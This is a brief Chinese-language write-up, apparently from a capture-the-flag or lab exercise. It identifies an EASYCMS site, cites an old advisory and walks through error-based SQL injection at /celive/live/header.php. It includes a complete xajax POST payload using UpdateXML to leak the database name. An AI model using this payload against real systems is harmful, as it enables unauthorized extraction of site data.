在文档下载的评论区发现是EASYCMS
百度EASYCMS存在的漏洞,发现存在无限制报错注入,可获取全站信息
漏洞参考:https://www.w00yun.top/bugs/wooyun-2015-0137013.html
访问/celive/live/header.php进行报错注入
爆数据库,得到“Yeser”
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>